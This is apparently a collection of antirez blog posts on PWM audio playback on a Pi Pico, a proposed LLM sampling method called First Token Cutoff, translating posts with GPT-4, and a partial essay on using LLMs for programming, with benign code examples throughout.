Playing audio files in a Pi Pico without a DAC - http://antirez.com/news/143 - Wed, 06 Mar 2024
One of the cool things one wants to do with an MCU like the Pico is generating some sound. The most obvious way to do this is using the built-in PWM feature of the chip. The GPIOs can be configured to just alternate between zero and one at the desired frequency, like this:

from machine import Pin, PWM
pwm = PWM(Pin(1))
pwm.freq(400)
pwm.duty_u16(1000)

Assuming you connected a piezo to GND and pin 1 of your Pico, you will hear a square wave sound at a frequency of 400 Hz. Now, few sounds are as terrible to hear as square waves. Maybe we can do better. I’ll skip all the intermediate steps here, like producing a sine wave, and directly jump to playing a wav file. Once you see how to do that, you can easily generate your own other waves (sine, noise, envelopes for such waveforms and so forth).

Now you are likely asking yourself: how can I generate the complex waveforms needed to play a wav file, if the Pico can only switch the pin high or low? A proper non-square waveform is composed of different levels, so I would need a DAC! Fortunately we can do all this without a DAC at all, with just a single pin of our Pico.

### How complex sound generation works

I don’t want to cover too much background here. But all you need to know is that, if you don’t want to generate a trivial square wave, which just alternates between a minimum and a maximum output level, you will need intermediate steps, like this:

S0: #
S1: ####
S2: ######
S3: #######
S4: ########

And so forth, where S0 is the first sample, S1 the second sample, and so on.

Each sample's duration depends on the sampling frequency, that is, how many times per second we change (when playing) or sample (when recording) the audio wave: at 24000 Hz, for instance, each sample lasts about 42 microseconds. This means that to play a complex sound, we need the ability of our Pico pin to output different voltages.

There is a trick to do this with the Pico using just PWM: use a square wave with a very high frequency, but with a different duty cycle for each of the different voltages we want to generate. So we set a very, very high output frequency:

pwm.freq(100000)

Then, if we want to produce the S0 sample, we set the duty cycle (whose value is between 0 and 65535) to a small value. If we want to produce the S1 sample, we use a higher value, and so forth. In sequence we may want to do something like this:

pwm.duty_u16(3000) # S0
pwm.duty_u16(12000) # S1
pwm.duty_u16(18000) # S2
pwm.duty_u16(21000) # S3
pwm.duty_u16(24000) # S4

The duty cycle is how much time the pin is set to 1 versus how much time it is set to 0. A duty cycle of 65535 means the pin is high 100% of the time; 0 means it is low all the time. All this while preserving the configured alternating frequency. So if we zoom in, as if we had an oscilloscope, we can see what happens during the S2 and S3 sample generation:

S2:
######################
#
#
#
#
######################
#
#
#
#

While S3 will be like:
######################
######################
#
#
#
######################
######################
#
#
#

The pin goes up and down with the same frequency, but in the case of S3 it stays up longer. This produces a higher average voltage, and this is what allows us to approximate our wave.

### Convert and play a WAV file

In order to play a wav file, we have to convert it into a raw format that is easy to read from MicroPython. I downloaded a wav file saying “Oh no!” from SoundCloud. So my conversion looks like this:

ffmpeg -i ohno.wav -ar 24000 -acodec pcm_u8 -f u8 output.raw

Note that we converted the file to 8-bit audio (256 different output levels per sample). Our PWM trick is not going to approximate the different levels very well anyway, and we are resource constrained. You can try with 16 bits as well, but I got decent results like this.

Then, upload the output.raw file to the device via mpremote:

mpremote cp output.raw :

Now write a file called “play.py”, or whatever you wish, with this content:

from machine import Pin, PWM

pwm = PWM(Pin(1))
pwm.freq(100000)

f = open("output.raw","rb")
buf = bytearray(4096)
while f.readinto(buf) > 0:
    for sample in buf:
        pwm.duty_u16(sample<<8)
        # Crude delay: see below, this roughly matches the
        # 24000 samples per second rate of the file.
        x=1
        x=1
        x=1
        x=1
        x=1
f.close()

What we are doing here is just reading the file, 4096 samples per iteration, then “playing” it by setting different PWM duty cycles one after the other, according to the sample values. The problem is, our PCM file has 24000 samples per second (see the ffmpeg command line). How can we be sure that this matches the MicroPython speed? Well, indeed it is not a perfect match, so I added the “x=1” statements to delay the loop a bit, until the pitch sounded roughly correct.
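
A more principled way to pace playback, instead of tuning dummy statements by ear, could be to busy-wait on MicroPython's microsecond ticks until each sample's deadline. This is just a sketch of the idea, replacing the inner loop above (untested on real hardware, and whether the interpreter can sustain 24 kHz this way is a separate question):

import time

SAMPLE_US = 1000000 // 24000  # ~41 microseconds per sample at 24 kHz

next_t = time.ticks_us()
for sample in buf:
    pwm.duty_u16(sample << 8)
    next_t = time.ticks_add(next_t, SAMPLE_US)
    while time.ticks_diff(next_t, time.ticks_us()) > 0:
        pass  # busy-wait until the next sample deadline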

Oh, and if you are wondering what the sample<<8 thing is, it just rescales an 8-bit sample to the full 16-bit precision needed to set the PWM duty cycle.

The downside of all this is that it keeps your program busy while playing. I didn’t test it yet, but MicroPython supports threading, so having a thread play the audio could be the way to go.
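
For example, something like this minimal sketch (assuming the RP2 port's _thread module, and omitting any timing calibration):

import _thread
from machine import Pin, PWM

def play_file(filename):
    # Same playback loop as above, but running on the second core.
    pwm = PWM(Pin(1))
    pwm.freq(100000)
    f = open(filename, "rb")
    buf = bytearray(4096)
    while f.readinto(buf) > 0:
        for sample in buf:
            pwm.duty_u16(sample << 8)
    f.close()

# Start playback on the other core; the main program keeps running.
_thread.start_new_thread(play_file, ("output.raw",))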

### Bonus point: sine wave sound generation
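
The same PWM trick can of course generate any waveform, not just samples read from a file. For instance we can precompute one period of a sine as a table of duty cycle values, and then loop over the table (in the snippet below the value is rescaled so that it stays within the 0-65535 duty cycle range):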

# Sine wave
import math
from machine import Pin, PWM

pwm = PWM(Pin(1))
pwm.freq(100000)

wave=[]
wave_samples = 40
for i in range(wave_samples):
    x = i/wave_samples*3.14*2
    # (1+sin(x)) is in the 0..2 range: scale it to 0..65535.
    dc = int((1+math.sin(x))*0.5*65535)
    wave.append(dc)
print(wave)

for i in range(1000):
    for dc in wave: pwm.duty_u16(dc)
First Token Cutoff LLM sampling - http://antirez.com/news/142 - Fri, 12 Jan 2024
Today one of the most used sampling methods, more or less the default, is called top-p: it is a form of nucleus sampling where top-scoring tokens are collected up to a total probability sum of “p”, then a weighted random pick is performed among them.

In this blog post I’ll examine why I believe nucleus sampling may not be the best approach, and I will show a simple and understandable alternative that avoids its issues. The algorithm is still a work in progress, but by publishing it now I hope to stimulate some discussion / hacking.

## There is some gold in the logits

Despite the fact that LLM logits are one of the few completely understandable parts of the LLM inner workings, I generally see very little interest in studying their features, investigating more advanced sampling methods, or detecting and signaling to users uncertainty and likely hallucinations. Visualizing the probability distribution of successive tokens is a simple and practical exercise to gain some insight:

[Image: the top 32 candidate tokens at each generation step, colored by probability]

In the image we can see the top 32 candidate tokens colored by probability (white = 0, blue = 1), the selected token, and the rank of the selected token (highest probability = 0, second highest = 1, and so forth).

In the above example, the Mistral base model knows the birth and death dates of Umberto Eco, so it confidently assigns most of the total probability to the most likely token. Other times the model is more perplexed, either because there are multiple ways to express the continuation of the text, or because it is not certain about certain facts. Asking for the dates of a person whose birthday was not learned during training produces a very different distribution of token probabilities.

However, in general what we want to avoid is selecting suboptimal tokens, putting the LLM generation outside the path of minimum perplexity and hallucination. Nucleus sampling fails at this because, depending on the distribution, accumulating tokens up to “p” may include tokens that are far weaker than the first choice. Consider, for instance, the “writer” token in the image above. Umberto Eco was a writer, indeed. The token associated with “writer”, while not scoring a very high value, is still well above the second choice. Yet a p of 0.3 may accumulate a second token with a low value like 0.01, and yield it with some single-digit probability, risking putting the generation on the wrong path.

Instead, in the case of the following token, “who”, there are multiple choices with relatively similar scores that could be used for alternative generations.

## Making use of the avalanche effect

A key observation here is that selecting tokens that are too weak for the sake of variability is not a good deal: even if, to diversify the output, we only exploit the generation moments where there are a few good candidates, the avalanche effect will help us: the input context will change, thus the output of the LLM will be perturbed, making it more likely to produce some alternative version of the text.

## First Token Cutoff (FTC) algorithm

DISCLAIMER: The algorithm described here hasn’t undergone any scientific scrutiny. I experimented for a couple of days with different sampling algorithms having “bounded worst token” properties, and this one looks like the best balance between applicability, results and understandability.

The algorithm described here can be informally stated as follows:

- When the LLM is strongly biased towards a given candidate, select it.
- When there are multiple viable candidates, produce alternatives.
- The selection of the worst possible token should be bounded to a given amount.

Past work, like Tail Free Sampling, also noted that the selection should be made across a small set of high-quality tokens emitted by the LLM. However, in TFS such a set is identified by taking the derivative of the sorted token scores, in order to select the cluster of tokens that comes before the steep drop after which token quality decreases strongly.

In the algorithm proposed here, instead, we want the selection to follow a more bounded and understandable cut-off relative to the highest scoring token T0, attributing to T0 a special meaning compared to all the other tokens: it represents the level of certainty the LLM has while emitting that token (a proxy for perplexity, basically). Thus the algorithm refuses every token that is worse than a given percentage when compared to T0.

The cut-off percentage, which can have a value from 0 to 1, is called “co”. A viable example value for “co” could be 0.5.

This is how the algorithm works:

1. Compute softmax() of logits.
2. Sort tokens by probability.
3. Given T0, the probability of the best token, compute for each other token T[i] the ratio:

r = 1 - (T[i] / T0)

4. Select only tokens for which r <= co
5. Perform weighted random pick among the selected tokens.

Note that in this way, even when token scores decrease smoothly and monotonically, there is a hard limit on the tokens we can include in the set of possibilities. This is not the case with other methods that try to identify high-score clusters.

## Practical examples

One reason why nucleus (top-p) sampling does not seem to fail catastrophically in practice is that often the first token's probability is very high, that is, the perplexity is low; and when low-quality tokens do get collected, most of the time the weighted pick does not select them, so the generation continues along a sensible path.

Things are more problematic when there are successive tokens with probabilities like:

0.25, 0.14, 0.01

With p=0.4, we could collect the third, low-quality token and yield it with ~3% probability.

Now consider First Token Cutoff with a co value of 0.5 (a token can be up to 50% worse than the first one).

The r values of the second and third tokens are:

r[t1] = 1-(0.14/0.25) = 0.44 # 0.44 <= 0.5, this token is accepted
r[t2] = 1-(0.01/0.25) = 0.96 # 0.96 > 0.5, this token is refused
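
Putting the five steps together, here is a minimal sketch of the whole selection in plain NumPy (the function name is illustrative, not from any library; it uses the same toy distribution as above, which the softmax renormalizes without changing the T[i]/T0 ratios, so the r values stay the same):

import numpy as np

def first_token_cutoff(logits, co=0.5, rng=np.random.default_rng()):
    probs = np.exp(logits - np.max(logits))   # 1. softmax
    probs /= probs.sum()
    order = np.argsort(probs)[::-1]           # 2. sort by probability
    t0 = probs[order[0]]
    # 3-4. Keep only tokens with r = 1 - T[i]/T0 <= co.
    accepted = [i for i in order if 1 - probs[i] / t0 <= co]
    weights = probs[accepted] / probs[accepted].sum()
    return rng.choice(accepted, p=weights)    # 5. weighted random pick

# Tokens 0 and 1 can be picked; token 2 is refused (r = 0.96 > 0.5).
token = first_token_cutoff(np.log([0.25, 0.14, 0.01]), co=0.5)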

## Example output

Outputs of the Mistral base model (not the instruct version) with co=0.7 for the prompt “Sorted sets are”.
These are three successive outputs, not cherry-picked for quality.

1. Sorted sets are a powerful data structure in Redis. They can be used to store sorted lists, to store unique values, to store scores for ranking, and to store a sorted list of sorted sets.

2. Sorted sets are a very powerful data structure. They allow you to store data in a way that makes it easy to find the highest or lowest values in the set, and they also allow you to sort the data. This can be useful for many different tasks, such as ranking users by their score, or finding the most popular items in a database.

3. Sorted sets are a very powerful data structure that can be used to solve many different problems. The most common use case is to store a list of unique elements, each of which has an associated value. For example, you could use a sorted set to store the names of all the people in your family, with their ages as the associated values.

## Why understandability matters

Sampling parameters are among the few things that end users of LLMs, or API users, must tune. Trial and error is often needed; however, having a single tunable parameter with an immediate real-world description and intuition helps a lot. Moreover, "co" is a linear parameter, so it is particularly simple to reason about, compared to parameters like temperature, or even the "p" of top-p which, while linear, strongly depends on the shape of the logits distribution.

## Future work

I’m at the start of my investigations, so I’ll study and evaluate this algorithm better. More than anything else, I would love to see more interest in sampling algorithms, and more interest in moving on from top-p-like approaches.

There is perhaps interesting information to collect from the logits distribution. For example, it is likely that a linear probe could learn when the hidden layers of an LLM are dealing with factual information. This, together with the token perplexity, could be used to show the user that some part of the output is likely wrong. In general, visualizing the token probability distribution is very informative, and in some way lets you touch with bare hands how LLMs work and what the candidates are at each step.

## Reference implementation

import mlx.core as mx
import numpy as np

# `logits` is the model output for the last position.
probs = mx.softmax(logits)
np_probs = np.array(probs) # MX -> NumPy
np_probs = np_probs.flatten()
sorted_indices = np.argsort(np_probs)
sorted_indices = sorted_indices[::-1]

co = 0.7
j = 1
t0 = np_probs[sorted_indices[0]]
while j < len(np_probs) and 1 - (np_probs[sorted_indices[j]] / t0) < co:
    j += 1
accepted_probs = []
for i in range(0,j):
    accepted_probs.append(float(np_probs[sorted_indices[i]]))
# categorical() samples proportionally to exp() of its input, so we pass
# log-probabilities in order to pick tokens weighted by probability.
accepted_logits = mx.log(mx.array(accepted_probs))

idx = mx.random.categorical(accepted_logits)
idx = int(np.array(idx)) # Convert zero-dim array to scalar
token_id = sorted_indices[idx]


## Credits

These experiments were really simple to perform thanks to the MLX library from Apple, and the cool and smart developers working incessantly on it. MLX is extremely accessible, as it should be: after all, LLMs are inscrutable, but the inference itself is a simple process.
Translating blog posts with GPT-4, or: on hope and fear - http://antirez.com/news/141 - Tue, 09 Jan 2024
1. Think about what I want to say for weeks or months. No, I don’t spend weeks focusing on a blog post; the process is exactly the reverse: I write blog posts about things that are important enough to me to stay in my mind for weeks.

2. Then, once enough ideas have collapsed together into a decent form, I write the blog post in 30 minutes, often without caring much about the form, and I hit “publish”. This usually works by writing the section titles first, as initially I only have the big picture of what I want to say, and then filling the empty paragraphs with text.

Why do I take step 2 so lightly? Because I have other stuff to do, and if blogging took more than 30-60 minutes I would rather not blog at all, or blog less, or suffer doing it: all things I want to avoid at all costs. Blogging is too important to let it go. It’s better, for me, to give up on the form.

At the same time, this is why many of my blog posts, regardless of content that may be more or less informative, more or less useful, are generally badly written. I hope that the fact I can write well enough in my mother tongue is in some way still visible in my English posts, but I have the feeling that the extremely limited vocabulary I possess, the grammar errors, the sentence constructions that I often just take from Italian and turn into English, all those limits irremediably damage the reading experience.

This is why, for the first time, to write my blog post about LLMs and programming I tried a different approach: I wrote the post in Italian and translated it to English using GPT-4. The result is a much better blog post than usual, I believe, and the total time to write it was comparable to writing it in English, because writing in Italian is a bit faster, and this compensated for the time needed to cut & paste the sections into GPT-4, wait for the output, check that it matched the Italian meaning, and do a few corrections and rewrites when needed.

It shocks me that I can hear my voice when reading the translation. It does not sound written by somebody else. And, interestingly, the tools that claim to spot GPT-generated text tell me that the post was written “100% by human”. At the same time, the process may look a bit synthetic: even worse, I may lose confidence writing English if I continue along this path, so I’m still not sure how this blog will be written in the future. One thing is sure: the post you are reading is not just written by myself but, as the tradition of this blog demands, not even re-read or corrected except for a quick second pass. This way you can see what my written English really is and, if you are curious, compare it with the post about LLMs. The difference is nothing short of huge.

Another point of view on the matter could be that my true voice is the one of the translated blog post, so writing in English is the real bluff here. The translated post is more representative of my lexical ability in my mother tongue, not of the reduced one I can field when writing in English. Maybe it captures more shades of what I really want to say. But then one could go deeper into arguments about what style really is. Is it more about sentence construction and the way you put down your ideas, or is it a lot more about the vocabulary used, the exact words and adjectives selected to convey a given image and meaning? Probably both, and the two things are quite an inseparable whole.

Anyway, the simple fact that now, in 2024, I finally have this choice fills me with hope and fear. Hope for the possibilities humanity will have, with machines that can talk. And fear about the potential AI has to make everybody lazy, no longer willing to do things as hard as learning a new language.
LLMs and Programming in the first days of 2024 - http://antirez.com/news/140 - Tue, 02 Jan 2024
Meanwhile, I am certainly not a novice in programming. I am capable of writing code without any aid, and indeed, I do so quite often. Over time, I have increasingly used LLMs to write high-level code, especially in Python, and much less so in C. What strikes me about my personal experience with LLMs is that I have learned precisely when to use them and when their use would only slow me down. I have also learned that LLMs are a bit like Wikipedia and all the video courses scattered on YouTube: they help those with the will, ability, and discipline, but they are of marginal benefit to those who have fallen behind. I fear that at least initially, they will only benefit those who already have an advantage.

But let's take it step by step.

# Omniscient or Parrots?

One of the most concerning phenomena of this new wave of novelty and progress in machine learning is the limited ability of AI experts to accept their limited knowledge. Homo sapiens invented neural networks, and then, even more crucially, an algorithm to automatically optimize the parameters of a neural network. Hardware has become capable of training increasingly larger models, and using statistical knowledge about the data to be processed (the priors) and through a lot of trial and error for successive approximations, architectures have been discovered that work better than others. But all in all, neural networks remain quite opaque.

In the face of this inability to explain certain emerging capabilities of LLMs, one would have expected more caution from scientists. Instead, many have deeply underestimated LLMs, saying that after all they were nothing more than somewhat advanced Markov chains, capable, at most, of regurgitating extremely limited variations of what they had seen in the training set. Then this notion of the parrot, in the face of evidence, was almost universally retracted.

At the same time, much of the enthusiastic masses attributed to LLMs supernatural powers that do not exist in reality. Unfortunately, LLMs can, at most, interpolate in the space represented by the data they have seen during training: and this would already be a lot. In reality, their ability to interpolate is limited (but still astonishing, and also unexpected). Oh, if only the largest LLMs of today could interpolate continuously in the space bounded by all the code they have seen! Even if they would not be able to produce true novelties, they would be able to replace 99% of programmers. The reality is more modest, as it almost always is. An LLM is certainly capable of writing programs that it has not seen in that exact form, showing a certain ability to blend different ideas that appeared in the training set with a certain frequency. It is also clear that this ability has, at the moment, deep limits, and whenever subtle reasoning is required, LLMs fail disastrously. Yet they represent the greatest achievement of AI, from its dawn to today. This seems undeniable.

# Stupid but All-Knowing

It's true: LLMs are capable, at most, of rudimentary reasoning, often inaccurate, many times peppered with hallucinations about non-existent facts. But they have a vast knowledge. In the field of programming, as well as in other fields for which quality data are available, LLMs are like stupid savants who know a lot of things. It would be terrible to do pair programming with such a partner (for me, pair programming is terrible even in the most general terms): they would have nonsensical ideas and we would have to continuously fight to impose our own. But if this erudite fool is at our disposal and answers all the questions asked of them, things change. Current LLMs will not take us beyond the paths of knowledge, but if we want to tackle a topic we do not know well, they can often lift us from our absolute ignorance to the point where we know enough to move forward on our own.

In the field of programming, perhaps their ability would have been of very little interest up to twenty or thirty years ago. Back then you had to know a couple of programming languages, the classic algorithms, and those ten fundamental libraries. The rest you had to add yourself, your own intelligence, expertise, design skills. If you had these ingredients you were an expert programmer, able to do more or less everything. Over time, we have witnessed an explosion of frameworks, programming languages, libraries of all kinds. An explosion of complexity often completely unnecessary and unjustified, but the truth is that things are what they are. And in such a context, an idiot who knows everything is a precious ally.

Let me give you an example: my experiments on machine learning were carried forward for at least a year using Keras. Then for various reasons, I switched to PyTorch. I already knew what an embedding or a residual network was, but I didn't feel like studying PyTorch's documentation step by step (as I had done with Keras, which I learned when ChatGPT did not yet exist). With LLMs, it was very easy to write Python code that used Torch. I just needed to have clear ideas about the model I wanted to put together and ask the right questions.

# Time for Examples

I'm not talking about easy things like: "Hey, what's the method of class X to do Y"? If it were just for that, one might be tempted to agree with those who are skeptical about LLMs. What the more complex models are capable of is much more elaborate. Until a few years ago, it would have been pure magic. I can tell GPT4: look, this is the neural network model I have implemented in PyTorch. These are my batches. I would like to resize the tensors so that the function that emits the batches is compatible with the input of the neural network, and I would like to represent things in this particular way. Can you show me the code needed to do the reshaping? GPT4 writes the code, and all I had to do was test in the Python CLI if the tensors really have the dimensions that are useful to me and if the data layout is correct.

Here's another example. Some time ago I had to implement a BLE client for certain ESP32-based devices. After some research, I realized that multi-platform Bluetooth programming bindings are more or less all unusable. The solution was simple, write the code in Objective C using macOS's native API. So, I found myself having to deal with two problems at the same time: learning the cumbersome BLE API of Objective C, full of patterns that I consider nonsensical (I'm a minimalist, that kind of API is at the opposite end of the spectrum of what I consider "good design") and at the same time remembering how to program in Objective C. The last time I had written a program in Objective C was ten years ago: I didn't remember the details of the event loop, memory management, and much more.

The final result is this code here, not exactly beautiful, but it does what it has to do. I wrote it in an extremely short time. It would have been impossible otherwise.

https://github.com/antirez/freakwan/blob/main/osx-bte-cli/SerialBTE.m

The code was written mostly by cutting & pasting into ChatGPT the things I wanted to do but didn't quite know how to do, so that they didn't work properly, and by having the LLM explain to me what the problem was and how to solve it. It's true that the LLM didn't write much of that code, but it's also true that it significantly accelerated the writing. Would I have been able to do it without ChatGPT? Certainly yes, but the most interesting thing is not that it would have taken me longer: the truth is that I wouldn't even have tried, because it wouldn't have been worth it. This fact is crucial. The ratio between the effort and the benefit of writing such a program, secondary to my project, would have been inconvenient. Moreover, this had a secondary collateral effect much more useful than the program itself: for that project I modified linenoise (one of my libraries for line editing) so that it works in multiplexing.

Another example, this time less about code writing and more about data interpretation. I wanted to set up a Python script using a convolutional neural network I found online, but it was quite lacking in documentation. The network had the advantage of being in ONNX format, so I could easily extract a list of its inputs and outputs, and their assigned names. I only knew one thing about this convnet: it detected certain features within an image. I didn't know the input image format and size, and especially, the network's output was far more complicated than I imagined (I thought it was a binary classifier: is the observed image okay or does it have problems? Two outputs, but there were hundreds). I began by copy-pasting the ONNX network metadata output into ChatGPT, explaining to the assistant what little I knew about the network. ChatGPT hypothesized how the inputs were organized, and that the outputs were probably normalized boxes indicating parts of the images corresponding to potential defects, along with other outputs indicating the likelihood of those defects. After a few minutes of back-and-forth, I had a Python script capable of network inference, plus the necessary code to transform the starting image into the tensor suitable for input, and so on. What struck me about that session was that ChatGPT finally “understood” how the network functioned once it observed the raw output values (the logits, basically) on a test image: a series of floating-point numbers provided the context to identify the exact output details, the normalization, whether the boxes were centered or specified by their top-left corner, and so forth.

# Disposable Programs

I could document dozens of such cases like the ones I've narrated above. It would be pointless, as it's the same story repeating itself in more or less the same way. I have a problem, and I need to quickly know something that *I can verify*, to tell whether the LLM is feeding me nonsense. Well, in such cases, I use the LLM to speed up the acquisition of the knowledge I need.

However, there are different cases where I let the LLM write all the code. For example, whenever I need to write a more or less disposable program. Like this one:

https://github.com/antirez/simple-language-model/blob/main/plot.py

I needed to visualize the loss curve during the training of a small neural network. I showed GPT4 the format of the CSV file produced by the PyTorch program during training, and then asked that, if I specified multiple CSV files on the command line, instead of the training and validation loss curves of the same experiment I would get a comparison of the validation loss curves of different experiments. The above is the result, as generated by GPT4. Thirty seconds in total.

Similarly, I needed a program that read the AirBnB CSV report and grouped my apartments by month and year. Then, considering the cleaning costs, and the number of nights per booking, it would do statistics on the average rental price for different months of the year. This program is extremely useful for me. At the same time, writing it is deadly boring: there's nothing interesting. So I took a nice piece of the CSV file and did copy-paste on GPT4. I wrote to the LLM what the problem was to be solved: the program worked on the first try. I show it to you in full below.

```python
import pandas as pd
pd.set_option('display.max_rows', None)
df = pd.read_csv('listings.csv')
reservations = df[df['Type'] == 'Reservation']
reservations['Start Date'] = pd.to_datetime(reservations['Start Date'])
reservations['Year'] = reservations['Start Date'].dt.year
reservations['Month'] = reservations['Start Date'].dt.month
reservations['Nightly Rate'] = (reservations['Amount'] - reservations['Cleaning Fee']) / reservations['Nights']
all_listings = reservations['Listing'].unique()
all_years = reservations['Year'].unique()
all_months = range(1, 13)
index = pd.MultiIndex.from_product([all_listings, all_years, all_months], names=['Listing', 'Year', 'Month'])
all_data = pd.DataFrame(index=index).reset_index()
merged_data = pd.merge(all_data, reservations, on=['Listing', 'Year', 'Month'], how='left')
average_nightly_rates = merged_data.groupby(['Listing', 'Year', 'Month'])['Nightly Rate'].mean().fillna(0)
print(average_nightly_rates)
```

To understand exactly how to group the data, which were otherwise quite scattered and disordered, requires some simple reasoning: it’s not a problem that an LLM could solve simply by regurgitating something that approximates the language it has seen. GPT4 has certainly observed similar programs during its training, but almost certainly has not seen a program that had to group things in the exact way I asked for and in a CSV file with that specific format. This shows (in my opinion) that LLMs can interpolate to some extent within the space outlined by the different programs in the training set.

Writing this type of program would be, in my opinion, an imprudent use of my time. The fact that an LLM can do it for me certainly speeds up my ability to produce code in a rather direct way: I can focus on the things that matter.

# When things don't go as they should: System Programming

Despite my success with LLMs and programming, when I write a program in C, I almost always end up using LLMs only as a more convenient form of documentation. I am an expert in system programming, and in that context, LLMs would be useful to me only if they were capable of complex reasoning: in this scenario, they almost always fail.

Let's start with the prompt of this experiment:

Outline the requirements of a nice, small but working C implementation of a bloom filter. Focus on the important aspects of the hashing function. Then write it, in good quality C.

Also consider that your example implementation should be sized to store 100,000 elements, with a false positive probability of at most 5%. The elements added are null-terminated strings.

Here’s the output:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <math.h>

#define N 100000 // Number of elements
#define P 0.05 // False positive probability
#define M (int)(-(N * log(P)) / (log(2) * log(2))) // Size of bit array
#define K (int)(M / N * log(2)) // Number of hash functions

unsigned char bitArray[M / 8 + 1];

void setBit(int n) {
    bitArray[n / 8] |= 1 << (n % 8);
}

int getBit(int n) {
    return bitArray[n / 8] & (1 << (n % 8));
}

// Basic hash functions (for demonstration purposes)
int hash1(char *str) {
    int hash = 5381;
    int c;
    while ((c = *str++))
        hash = ((hash << 5) + hash) + c;
    return abs(hash % M);
}

int hash2(char *str) {
    unsigned long hash = 0;
    int c;
    while ((c = *str++))
        hash = c + (hash << 6) + (hash << 16) - hash;
    return abs(hash % M);
}

void add(char *str) {
    setBit(hash1(str));
    setBit(hash2(str));
    // Add more hash functions if needed
}

int is_in(char *str) {
    return getBit(hash1(str)) && getBit(hash2(str));
    // Check more hash functions if used
}

int main() {
    char *testStr = "testString";
    add(testStr);

    if (is_in(testStr)) {
        printf("%s is probably in the set.\n", testStr);
    } else {
        printf("%s is definitely not in the set.\n", testStr);
    }

    return 0;
}
```

The implementation produced by GPT4 is not exactly brilliant. Bloom filters are quite widespread; it’s not such an exotic data structure. However, it’s clear that writing a decent bloom filter requires a greater capacity for abstraction: for example, there’s the problem of finding an effective way to hash the same string N times, while being certain that the hashes are sufficiently decorrelated.

Yet if you explicitly ask GPT4 to modify the hashing function so that it produces N decorrelated outputs, its proposed solution is significantly more acceptable:

```c
unsigned int hash(const char* str, unsigned int hash_id) {
    unsigned int hash = 5381;
    int c;
    while ((c = *str++)) {
        hash = ((hash << 5) + hash) + c + hash_id;
    }
    return hash % BF_SIZE;
}
```

If it had come up with this idea on its own, it would have written the bloom filter differently, setting K bits at a time using a single hashing function.
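
In other words, something along these lines (my sketch of the idea, in Python for brevity, reusing the salted djb2-style hash shown above):

```python
def hash_n(key, hash_id, m):
    # djb2 variant salted with hash_id: one function, N decorrelated outputs.
    h = 5381
    for c in key.encode():
        h = ((h << 5) + h + c + hash_id) & 0xFFFFFFFF
    return h % m

def bloom_add(bits, m, k, key):
    for hash_id in range(k):  # set K bits using the single seeded hash
        n = hash_n(key, hash_id, m)
        bits[n // 8] |= 1 << (n % 8)
```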

GPT4 was able to perform, in isolation, the task of writing an appropriate and more generic hashing function. But in the larger project of writing a bloom filter, it failed to show sufficient reasoning ability, and instead spat out two different but similar hashing functions: this is what one would expect from a poorly written article example on bloom filters.

The current weak reasoning abilities of Large Language Models, combined with a possible scarcity of sources on the subject, and even worse, potentially many low-quality sources, collectively result in this meager outcome. Yet, this is not an isolated case. The few times I attempt to use LLMs in the realm of algorithmic or system programming, the results are extremely poor, even when the expected reasoning abilities are not greater than what LLMs seem to possess in contexts like Python programming.

At the same time, GPT-4 is capable of decompiling the function it produced (in a separate session), and also of precisely understanding its purpose:

https://chat.openai.com/share/f54b64d7-d19a-4be4-8f10-08553aa812f1

Therefore, stating that there are no uses in system programming contexts is certainly inaccurate.

One interesting and pretty much expected thing is that, in these cases, the difference between smaller and larger models is indeed significant. Let’s see how two local models fare.

For instance, Mixtral, the MoE of Mistral, responded to the same question as follows:

```c
unsigned int hash(const char* str, unsigned int hash_id) {
    unsigned int hash = 5381;
    int c;
    while ((c = *str++)) {
        hash = ((hash << 5) + hash) + c;
    }
    return hash + hash_id;
}
```

Clearly, adding `hash_id` only at the end is an extremely poor solution. Mixtral is an excellent model for many uses, but as for the already weak reasoning capabilities of LLMs, the rule so far is certainly: larger is better.

This is a chat with the local LLM deepseek-coder, quantized to 4 bits as I don’t have enough RAM to use the model at higher precision. Yet, being 34 billion parameters large, its reasoning capabilities on this matter seem quite advanced. Here’s the log of the chat (conducted with llama.cpp):

> I have a hash function that should output N distinct hashes for the same data. However, I'm seeing a very poor distribution of the produced hashes as I change the value of hash_id:

unsigned int hash(const char* str, unsigned int hash_id) {
    unsigned int hash = 5381;
    int c;
    while ((c = *str++)) {
        hash = ((hash << 5) + hash) + c;
    }
    return hash + hash_id;
}

Maybe the salting strategy I'm using is poor? How could I change it?

[Deep-seek coder reply]

A possible issue with your implementation is that you're simply adding `hash_id` to the end of the hash. This can potentially lead to a poor distribution, especially if `hash_id` is too large or is not evenly distributed.

Consider using bitwise operations for mixing the `hash_id` in. Here is an example with XOR:

```c
unsigned int hash(const char* str, unsigned int hash_id) {
    unsigned int hash = 5381;
    int c;
    while ((c = *str++)) {
        hash = ((hash << 5) + hash) ^ c + hash_id; // Using XOR to mix in the hash_id
    }
    return (hash ^ hash_id); // Mixing the hash_id one more time at the end
}
```

This will spread `hash_id` throughout your hashes better than simply adding it, which can lead to less uniform distribution. [Snipped… the actual reply contained more informative stuff]

Not bad for a model running on my MacBook M1 Max. It also mixed the sums with XORs. In this case, the model was certainly helped by the fact that I provided clues about the problem to solve, but it was the model that identified the real source of the trouble, and the proposed alternative is valid. Something like the above is not within the reach of any book, documentation, or Google search. However primitive, a result of interpolation, or however you want to perceive it, the model has performed some form of reasoning, if by reasoning, in this specific case, we accept the identification of the origin of a problem and its potential solution. However one wants to think about LLMs, stating that they are not helpful for programmers is extremely rash.

At the same time, however, my experience over the past few months suggests that for system programming, LLMs almost never provide acceptable solutions if you are already an experienced programmer. Let me show you another real world example. My current project, ggufflib, involves writing a library that reads and writes GGUF format files, which is the format in which llama.cpp loads quantized models. Initially, to understand how the quantization encodings worked (for speed reasons the bits of each quant are stored in fancy ways), I tried using ChatGPT, but then I resolved to reverse engineer llama.cpp's code: it was much faster. An LLM that can decently assist a system programmer, if it sees the data encoding “struct” declaration and the decoding function, should be able to reconstruct the data format documentation. The functions of llama.cpp were small enough to fit entirely in the context of GPT4, yet the output was completely useless. In these cases, things are done as in the past: paper and pen, reading the code, and seeing where the bits that the decoder extracts are registered.

Let me explain the above use case better, so that you can try it yourself if you wish. We have this structure from the llama.cpp implementation:

// 6-bit quantization
// weight is represented as x = a * q
// 16 blocks of 16 elements each
// Effectively 6.5625 bits per weight
typedef struct {
    uint8_t ql[QK_K/2];      // quants, lower 4 bits
    uint8_t qh[QK_K/4];      // quants, upper 2 bits
    int8_t  scales[QK_K/16]; // scales, quantized with 8 bits
    ggml_fp16_t d;           // super-block scale
} block_q6_K;

Then there is this function that is used to perform the dequantization:

void dequantize_row_q6_K(const block_q6_K * restrict x, float * restrict y, int k) {
    assert(k % QK_K == 0);
    const int nb = k / QK_K;

